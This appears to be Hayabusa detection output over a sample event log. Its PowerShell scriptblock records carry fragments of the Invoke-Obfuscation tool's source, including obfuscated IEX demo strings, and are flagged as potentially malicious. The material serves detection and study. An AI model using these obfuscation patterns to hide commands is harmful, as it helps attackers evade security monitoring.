If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} # Output menu. 
Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. 
If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. 
If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Host $RedactionMessage -NoNewLine 
-ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. 
$Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. 
Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. 
'((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. 
Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. 
Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. 
